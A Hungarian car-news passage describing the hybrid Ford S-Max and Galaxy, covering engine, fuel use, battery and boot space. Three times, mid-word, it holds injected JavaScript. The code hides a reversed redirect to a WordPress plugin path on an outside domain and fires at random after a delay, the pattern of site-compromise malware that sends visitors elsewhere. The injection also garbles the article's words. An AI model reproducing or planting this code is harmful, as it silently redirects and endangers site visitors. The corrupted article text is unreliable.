A buszlimuzinok piaca nem harapott rá a hibrid technológiára – talán azért, mert egyre kevesebben vesznek buszlimuzint. A Ford azonban nem zavartatja magát, és rögtön kettőnek (az S-Maxnak és a Galaxynak) is elkészítette a benzin-elektromos kivitelét. Mindkettőben ugyanaz a 2,5 literes, Atkinson ciklusú benzinmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor dolgozik, amelynek a fogyasztását átlagosan 6,4 l/100 km-re viszi le a hozzá kapcsolt villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor, amely egy apró, 1,1 kWh kapacitású lítiumion-akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torról táplálkozik. Ez utóbbi 60 celláját a vízhűtésnek köszönhetően kompaktra csomagolhatták, így az akku elfér a csomagtartó padlója alatt, a raktér kapacitása nem csorbul: három üléssorral 285 (Galaxy: 300) liter, kétszemélyes elrendezésben akár 2200 (Galaxy: 2339)…
- Hirdetés -